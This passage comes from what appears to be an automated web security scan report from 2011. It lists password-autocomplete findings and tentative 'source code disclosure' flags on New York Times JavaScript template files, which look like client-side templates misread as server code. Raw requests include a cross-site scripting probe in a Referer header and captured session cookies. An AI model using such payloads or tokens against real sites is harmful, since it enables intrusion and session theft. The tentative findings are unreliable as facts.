Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.3.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:31:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
</p>
<form name="registrationForm" id="registrationForm" action="/index.cfm?pageID=60&p=createaccount2" method="post" class="formborder" onsubmit="return _CF_checkregistrationForm(this)">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
...[SNIP]...
<td style="padding-left:10px;"><input style="width:200px;" id="password" name="password" value="" type="password" class="required" /></td>
...[SNIP]...
<td style="padding-left:10px;"><input style="width:200px;" id="password2" name="password2" value="" type="password" class="required" equalTo="#password"></td>
...[SNIP]...

15.20. http://www.privateequityinfo.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.privateequityinfo.com/login.php

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.21. http://www.privateequityinfo.com/forgotpassword.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/forgotpassword.php

Issue detail

The page contains a form with the following action URL:

http://www.privateequityinfo.com/login.php

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.22. http://www.privateequityinfo.com/product_details.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/product_details.php

Issue detail

The page contains a form with the following action URL:

http://www.privateequityinfo.com/login.php

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.23. http://www.soundpatheview.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.soundpatheview.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.soundpatheview.com/

The form contains the following password field with autocomplete enabled:

Password

Request

Response

16. Source code disclosure previous next
There are 10 instances of this issue:

http://graphics8.nytimes.com/js/adx/googleads.js
http://graphics8.nytimes.com/js/app/community/V3/commentsTemplates.js
http://graphics8.nytimes.com/js/app/community/V3/commonTemplates.js
http://graphics8.nytimes.com/js/app/community/V3/recommender.js
http://graphics8.nytimes.com/js/app/lib/NYTD/0.0.1/template.js
http://graphics8.nytimes.com/js/app/timespeople/activities/1.6/activities.build.js
http://graphics8.nytimes.com/js/app/timespeople/toolbar/1.7/toolbar.build.min.js
http://graphics8.nytimes.com/js2/lib/facebook/article/1.0/build.min.js
https://myaccount.nytimes.com/js/adx/googleads.js
https://myaccount.nytimes.com/js/app/lib/NYTD/0.0.1/template.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

16.1. http://graphics8.nytimes.com/js/adx/googleads.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://graphics8.nytimes.com
Path:	/js/adx/googleads.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/adx/googleads.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=53C30AB57480F9FF91684174FCA4F3EF&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.13.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305122094061:ss=1305120271481; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 17979
Content-Type: application/x-javascript
Last-Modified: Wed, 23 Mar 2011 20:04:32 GMT
ETag: "463b-4d8a5250"
Accept-Ranges: bytes
Cache-Control: private, max-age=126326
Date: Thu, 12 May 2011 11:25:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17979

/*global NYTD, window, escape */
/*
$Id: googleads.js 62240 2011-03-22 20:02:02Z helckt $
(c) 2010 The New York Times Company
*/

NYTD.GoogleAds = NYTD.GoogleAds || {

   defaultGoogleParam
...[SNIP]...
<a href="#" onclick="linkbox(\'<%=url%>\',\'popWin\')">
...[SNIP]...
<span class="blue"><%=line1%></span><%=line2%><br/>'+
                   '<div class="link"><%=visibleUrl%></div>
...[SNIP]...
<a onclick="linkbox(\'<%=url%>\',\'popWin\')" class="blue" href="#"><%=line1%></a>' +
               '<br/><%=line2%><br/><%=line3%><br/>
...[SNIP]...
<a onclick="linkbox(\'<%=url%>\',\'popWin\')" class="green" href="#"><%=visibleUrl%></a>
...[SNIP]...
<a href="http://<%=queryHost%>/search/query?srchst=r&term=<%=term%>&google_ad_channel=health&' +
               'google_ad_client=ca-nytimes_radlinks_js&google_page_url=<%=thisPage%>">' +
                   '<%=term%>' +
               '</a>
...[SNIP]...
<tr class="listing" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">
...[SNIP]...
<a class="first" target="_blank" href="<%=url%>"><%=line1%></a><br/>' +
                   '<%=line2%><br/>' +
                   '<%=line3%><br/>' +
                   '<a class="last" target="_blank" href="<%=url%>"><%=visibleUrl%></a>
...[SNIP]...
<a href="<%=url%>" target="_top" title="go to <%=visibleUrl%>" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">' +
                   '<img border="0" src="<%=imageUrl%>" width="<%=imageWidth%>" height="<%=imageHeight%>">
...[SNIP]...
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="<%=imageWidth%>" height="<%=imageHeight%>" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">' +
                   '<param name="movie" value="<%=imageUrl%>">
...[SNIP]...
<embed src="<%=imageUrl%>" width="<%=imageWidth%>" height="<%=imageHeight%> type="application/x-shockwave-flash" AllowScriptAccess="never" pluginspage="http://www.macromedia.com/go/getflashplayer">
...[SNIP]...

16.2. http://graphics8.nytimes.com/js/app/community/V3/commentsTemplates.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://graphics8.nytimes.com
Path:	/js/app/community/V3/commentsTemplates.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/community/V3/commentsTemplates.js HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 13747
Content-Type: application/x-javascript
Last-Modified: Mon, 02 May 2011 12:34:08 GMT
ETag: "35b3-4dbea4c0"
Accept-Ranges: bytes
Cache-Control: private, max-age=290735
Date: Thu, 12 May 2011 11:03:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13747

/**
* $Id: commentsTemplates.js 64599 2011-04-12 06:16:53Z shahmeet.singh $
* NYTD Namespace is included in common.js
*/

NYTD.CRNR = window.NYTD.CRNR || {};

NYTD.CRNR.Templates.HeaderTemplat
...[SNIP]...
<h3 class="share"> \
       <% if(dataForTemplate.commentCountFlag == true) { %> \
           <%= dataForTemplate.totalComments %> of <%= dataForTemplate.totalcommentCount %> Readers\' Comments</h3> \
       <% } else { %> \
           <%= dataForTemplate.totalComments %> Readers\' Comments</h3>
...[SNIP]...
<% } %> \
       <% if(dataForTemplate.postCommentFlag) { %> \
           <div class="postComment">
...[SNIP]...
<li class="first <%= dataForTemplate.sortFilterTabs["allComments"] %>"><a href="<%= dataForTemplate.overflowPageURL %>?sort=<%= dataForTemplate.sortOrder %>">
...[SNIP]...
<li class="<%= dataForTemplate.sortFilterTabs["highlights"] %>"><a href="<%= dataForTemplate.overflowPageURL %>?sort=highlights">
...[SNIP]...
<li class="<%= dataForTemplate.sortFilterTabs["recommended"] %>"><a href="<%= dataForTemplate.overflowPageURL %>?sort=recommended">
...[SNIP]...
</li> \
           <% if(dataForTemplate.repliesFlag) { %> \
               <li class="<%= dataForTemplate.sortFilterTabs["replied"] %>"><a href="<%= dataForTemplate.overflowPageURL %>?sort=replied">
...[SNIP]...
<div class="guideKicker clearfix"> \
           <% if(dataForTemplate.sortFilterTabs["allComments"] == "selected") { %> \
               <div class="sortSequence">
...[SNIP]...
<ul> \
                       <% if(dataForTemplate.sortOrder == "oldest") { %> \
                           <li class="first">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?sort=newest">
...[SNIP]...
</li> \
                       <% } else { %> \
                           <li class="first">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?sort=oldest">
...[SNIP]...
<% } %> \
           <% if(dataForTemplate.totalCommentPages > 1) { %> \
               <div class="pagination">
...[SNIP]...
<input type="text" name="offset" onkeydown="NYTD.CRNR.pagination.paginate([event,this.value,<%= dataForTemplate.totalCommentPages %>])" value="1" name="offset"/><span class="paginationvalue"> of <%= dataForTemplate.totalCommentPages %></span>
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?sort=<%= dataForTemplate.sortOrder %>&offset=2">
...[SNIP]...
</div> \
   <% if(dataForTemplate.totalComments == 0) { %> \
                       <div class="header clearfix">
...[SNIP]...
<% } %> \
';

NYTD.CRNR.Templates.FooterTemplate = ' \
   <% if(dataForTemplate.totalCommentPages > 1) { %> \
       <div class="guideKicker backLink clearfix">
...[SNIP]...
<input type="text" name="offset" onkeydown="NYTD.CRNR.pagination.paginate([event,this.value,<%= dataForTemplate.totalCommentPages %>])" value="1" name="offset"/>
...[SNIP]...
<span class="paginationvalue"> of <%= dataForTemplate.totalCommentPages %></span>
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?sort=<%= dataForTemplate.pageSort %>&offset=2">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?permid=<%= dataForTemplate.commentSequence %>#comment<%= dataForTemplate.commentSequence %>" name="comment<%= dataForTemplate.commentSequence %>"><%= dataForTemplate.commentSequence %></a>.</div> \
           <div class="displayName"> \
               <% if(dataForTemplate.shareTP == true) { %> \
                   <a href="http://timespeople.nytimes.com/view/user/<%= dataForTemplate.userID %>/activities.html"><%= dataForTemplate.userDisplayName %></a> \
               <% } else { %> \
                   <%= dataForTemplate.userDisplayName %> \
               <% } %>
...[SNIP]...
<div class="location"><%= dataForTemplate.userLocation %></div> \
           <div class="date"><%= dataForTemplate.approveDate %></div> \
           <div class="time"><%= dataForTemplate.approveTime %></div>
...[SNIP]...
<div class="reviewText"><%= dataForTemplate.commentBody %></div>
...[SNIP]...
<div id="recommendation_<%= dataForTemplate.commentSequence %>" class="feedback">
...[SNIP]...
<span class="link"> \
                   <%= dataForTemplate.commentRecommend %> \
               </span>  \
               <% if(dataForTemplate.commentRecommended == true) { %> \
                   <span> \
               <% } else { %> \
                   <span class="caption">
...[SNIP]...
<% } %> \
               Recommended by <%= dataForTemplate.commentRecommendations %> Readers </span>
...[SNIP]...
<span name="reply" class="feedback" id="<%= dataForTemplate.commentSequence %>">
...[SNIP]...
 \
                               <% if(dataForTemplate.loggedIn == true) { %> \
                                       <div class="reportAbuse"> \
               <% if(dataForTemplate.reportAbuseFlag == true) { %> \
                                               <span class="flagged">
...[SNIP]...
</span> \
               <% } else { %> \
                                               <a href="#" id="<%= dataForTemplate.commentSequence %>" onclick="NYTD.CRNR.overlay.appear(event);return false;">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?permid=<%= dataForTemplate.commentSequence %>#comment<%= dataForTemplate.commentSequence %>" name="comment<%= dataForTemplate.commentSequence %>"><%= dataForTemplate.commentSequence %></a>
...[SNIP]...
<div class="displayName"> \
               <% if(dataForTemplate.shareTP == true) { %> \
                   <a href="http://timespeople.nytimes.com/view/user/<%= dataForTemplate.userID %>/activities.html"><%= dataForTemplate.userDisplayName %></a> \
               <% } else { %> \
                   <%= dataForTemplate.userDisplayName %> \
               <% } %>
...[SNIP]...
<div class="location"><%= dataForTemplate.userLocation %></div> \
           <div class="date"><%= dataForTemplate.approveDate %></div> \
           <div class="time"><%= dataForTemplate.approveTime %></div>
...[SNIP]...
<div class="reviewText"><%= dataForTemplate.commentBody %></div>
...[SNIP]...
<div id="recommendation_<%= dataForTemplate.commentSequence %>" class="feedback">
...[SNIP]...
<span class="link"> \
                       <%= dataForTemplate.commentRecommend %> \
                   </span>  \
                   <% if(dataForTemplate.commentRecommended == true) { %> \
                       <span> \
                   <% } else { %> \
                       <span class="caption">
...[SNIP]...
<% } %> \
                   Recommended by <%= dataForTemplate.commentRecommendations %> Readers </span>
...[SNIP]...
<span name="reply" class="feedback" id="<%= dataForTemplate.commentSequence %>">
...[SNIP]...
 \
                                       <% if(dataForTemplate.loggedIn == true) { %> \
                                               <div class="reportAbuse"> \
                                           <% if(dataForTemplate.reportAbuseFlag == true) { %> \
                                                       <span class="flagged">
...[SNIP]...
</span> \
                                           <% } else { %> \
                                                       <a href="#" id="<%= dataForTemplate.commentSequence %>" onclick="NYTD.CRNR.overlay.appear(event);return false;">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?permid=<%= dataForTemplate.commentSequence %>#comment<%= dataForTemplate.commentSequence %>" name="comment<%= dataForTemplate.commentSequence %>"><%= dataForTemplate.commentSequence %></a>.</div> \
           <div class="date"><%= dataForTemplate.approveDate %></div>\n<div class="time"><%= dataForTemplate.approveTime %></div>
...[SNIP]...
<div class="reply clearfix <%= dataForTemplate.editorSelection %>">
...[SNIP]...
<img src="<%= dataForTemplate.imageHost %>/images/global/icons/t_icon_16x16.gif">
...[SNIP]...
<div class="displayName"> \
               <% if(dataForTemplate.userURL) { %> \
                   <a href="<%= dataForTemplate.userURL %>"><%= dataForTemplate.userDisplayName %></a> \
               <% } else { %> \
                   <%= dataForTemplate.userDisplayName %> \
               <% } %>
...[SNIP]...
<div class="location"><%= dataForTemplate.userTitle %></div> \
           <div class="date"><%= dataForTemplate.approveDate %></div> \
           <div class="time"><%= dataForTemplate.approveTime %></div>
...[SNIP]...
<div class="reviewText"><%= dataForTemplate.commentBody %></div>
...[SNIP]...
<a title="Click here to suggest a correction" href="<%= dataForTemplate.myaccountHost %>/membercenter/feedback.html" id="suggestCorrectionsLink">Suggest a Correction to This <%= dataForTemplate.suggestionAsset %> »</a></h2></div> \
       <% if(dataForTemplate.userStatus) { %> \
           <p>
...[SNIP]...
<span class="userName"> <%= dataForTemplate.UserLoginId %></span>
...[SNIP]...
<input type="text" id="userDisplayName" value="<%= dataForTemplate.userDisplayName %>" name="userDisplayName"/>
...[SNIP]...
<input type="text" id="userLocation" value="<%= dataForTemplate.userLocation %>" name="userLocation"/>
...[SNIP]...
<input type="checkbox" class="displayInline" id="emailNotifyStatus" name="emailNotifyStatus" value="true" <%= dataForTemplate.checkBoxStatus %> /> \
                       <label class="displayInline" for="emailNotifyStatus">Send me a link to my published comment at <%= dataForTemplate.userEmail %> <a href=" http://www.nytimes.com/membercenter/">
...[SNIP]...
<input type="hidden" id="cNotify" name="cNotify" value="<%= dataForTemplate.checkBoxStatus %>"/> \
                       <input type="hidden" id="emailNotifyEmail" name="emailNotifyEmail" value="<%= dataForTemplate.userEmail %>">
...[SNIP]...
</p> \
       <% } else { %> \
           <p>You must <a href="http://www.nytimes.com/auth/login?URI=<%= dataForTemplate.currentURL %> ">
...[SNIP]...
<a href="http://www.nytimes.com/gst/regi.html?URI=<%= dataForTemplate.currentURL %>">
...[SNIP]...

16.3. http://graphics8.nytimes.com/js/app/community/V3/commonTemplates.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://graphics8.nytimes.com
Path:	/js/app/community/V3/commonTemplates.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/community/V3/commonTemplates.js HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 5611
Content-Type: application/x-javascript
Last-Modified: Tue, 21 Dec 2010 20:32:35 GMT
ETag: "15eb-4d110ee3"
Accept-Ranges: bytes
Cache-Control: private, max-age=371370
Date: Thu, 12 May 2011 11:03:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5611

/**
* $Id: commonTemplates.js 50880 2010-11-24 08:01:00Z pkarthik $
* NYTD Namespace is included in common.js
*/

NYTD.CRNR = window.NYTD.CRNR || {};

NYTD.CRNR.Templates = {
   CrnrTemplate: '
...[SNIP]...
<div class="header clearfix"> \
           <%= dataForTemplate.headerHtml %> \
           <%= dataForTemplate.crnrDataHtml %> \
           <%= dataForTemplate.footerHtml %> \
       </div>
...[SNIP]...
<div class="stars"> \
               <%= dataForTemplate.starsHtml %> \
           </div>
...[SNIP]...
</a> \
       <% if(dataForTemplate.showMessage == true) { %> \
           <div id="bozo"> \
               <% if(dataForTemplate.postCommentFlag == true) { %> \
                   <div id="postCommentLink"> \
                       <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                           <a title="Click here to submit another suggestion" href="#shareReview">
...[SNIP]...
</a> \
                       <% } else { %> \
                           <a title="Click here to submit another comment" href="#postComment">
...[SNIP]...
<div class="header" id="bozoDefault"> \
                   Thank you for your submission. Comments are moderated and generally will be posted if they are on-topic and not abusive. \
                   <% if(dataForTemplate.userEmailStatus == 1) { %> \
                       An email will be sent to you at <%= dataForTemplate.userEmail %> <a href="http://www.nytimes.com/membercenter/">
...[SNIP]...
<h3> \
                   <% if(dataForTemplate.titleFlag == true) { %> \
                       <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                           Your Submitted Suggestions \
                       <% } else { %> \
                           Your Submitted Review \
                       <% } %> \
                   <% } else { %> \
                       Your Submitted Comments \
                   <% } %>
...[SNIP]...
</div> \
       <% } else { %> \
           <div id="bozo" class="hide hidden hideContent">
...[SNIP]...
<div <%= dataForTemplate.firstBozoComment %> class="bozoComment">
...[SNIP]...
<p> \
                       <% if(dataForTemplate.shareTP == true) { %> \
                           <a href="http://timespeople.nytimes.com/view/user/<%= dataForTemplate.userID %>/activities.html"><%= dataForTemplate.userDisplayName %></a> \
                       <% } else { %> \
                           <%= dataForTemplate.userDisplayName %> \
                       <% } %>
...[SNIP]...
<div class="secondColumn"> \
                   <%= dataForTemplate.userRatingHTML %> \
                   <h4>
...[SNIP]...
<p><%= dataForTemplate.userLocation %></p> \
               </div> \
               <% if(dataForTemplate.titleFlag == true) { %> \
                   <div class="clearfix">
...[SNIP]...
<p><%= dataForTemplate.commentTitle %></p> \
                   </div> \
                   <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                       <h4>
...[SNIP]...
</h4> \
                   <% } else { %> \
                       <h4>
...[SNIP]...
<% } %> \
               <% } else { %> \
                   <h4>
...[SNIP]...
<p><%= dataForTemplate.commentBody %></p>
...[SNIP]...
<div class="header" id="bozoDefault"> \
           Thank you for your submission. Comments are moderated and generally will be posted if they are on-topic and not abusive. \
           <% if(dataForTemplate.commentNotify == true) { %> \
               An email will be sent to you at <%= dataForTemplate.userEmail %> <a href="http://www.nytimes.com/membercenter/">
...[SNIP]...
<h3> \
           <% if(dataForTemplate.titleFlag == true) { %> \
               <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                   Your Submitted Suggestion \
               <% } else { %> \
                   Your Submitted Review \
               <% } %> \
           <% } else { %> \
               Your Submitted Comment \
           <% } %>
...[SNIP]...
<p><%= dataForTemplate.userDisplayName %></p>
...[SNIP]...
<div class="secondColumn"> \
               <%= dataForTemplate.userRatingHTML %> \
               <h4>
...[SNIP]...
<p><%= dataForTemplate.userLocation %></p> \
           </div> \
           <% if(dataForTemplate.titleFlag == true) { %> \
               <div class="clearfix">
...[SNIP]...
<p><%= dataForTemplate.title%></p> \
               </div> \
               <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                   <h4>
...[SNIP]...
</h4> \
               <% } else { %> \
                   <h4>
...[SNIP]...
<% } %> \
           <% } else { %> \
               <h4>
...[SNIP]...
<p><%= dataForTemplate.commentBody %></p>
...[SNIP]...
</span> \
           <%= dataForTemplate.starsHtml %> \
       </div>
...[SNIP]...
<h3> \
           <% if(dataForTemplate.titleFlag == true) { %> \
               <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                   Your Submitted Suggestion \
               <% } else { %> \
               Your Submitted Review \
               <% } %> \
           <% } else { %> \
               Your Submitted Comments \
           <% } %>
...[SNIP]...
<embed src="<%= dataForTemplate.imageHost %>/images/apps/mytimes/spinner.swf" height="20" style="width:100%;"/>
...[SNIP]...

16.4. http://graphics8.nytimes.com/js/app/community/V3/recommender.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://graphics8.nytimes.com
Path:	/js/app/community/V3/recommender.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/community/V3/recommender.js HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 4230
Content-Type: application/x-javascript
Last-Modified: Tue, 05 Apr 2011 11:57:38 GMT
ETag: "1086-4d9b03b2"
Accept-Ranges: bytes
Cache-Control: private, max-age=133403
Date: Thu, 12 May 2011 11:03:07 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4230

/**
* $Id: recommender.js 63302 2011-03-30 06:41:04Z manu.mohan $
* REQUIRES: /js/app/common/communityXHR.js
* NYTD Namespace is included in common.js
*/

NYTD.CRNR = window.NYTD.CRNR || {};
...[SNIP]...
<span class="link">\
<% if(!dataForTemplate.recommended) { %>\
<span class="left"><%= dataForTemplate.unicodeSpace %></span>
...[SNIP]...
<a href="javascript:NYTD.CRNR.recommender.request(<%= dataForTemplate.commentSequence %>, <%= dataForTemplate.recommended %>);"\
<% if(dataForTemplate.recommended) {%> class="recommended" onmouseover="tooltip.extShow(this,'Undo your recommendation.','autoWidth',15,15);" onmouseout="tooltip.rollout();"<% }%> >\
<% if(dataForTemplate.recommended) {%> Recommended <% }else { %> Recommend <% } %>
...[SNIP]...
</a>\
<% if(!dataForTemplate.recommended) { %>\
</span>
...[SNIP]...
<span class="right"><%= dataForTemplate.unicodeSpace %></span>
...[SNIP]...
<span <% if(!dataForTemplate.recommended) {%> class="caption" <% } %> >\
Recommended by <%= dataForTemplate.recommendations %> Reader<% if(dataForTemplate.recommendations > 1) { %>s<% } %>
...[SNIP]...

16.5. http://graphics8.nytimes.com/js/app/lib/NYTD/0.0.1/template.js previous next

Summary

Severity:	Low
Confidence:	Tentative
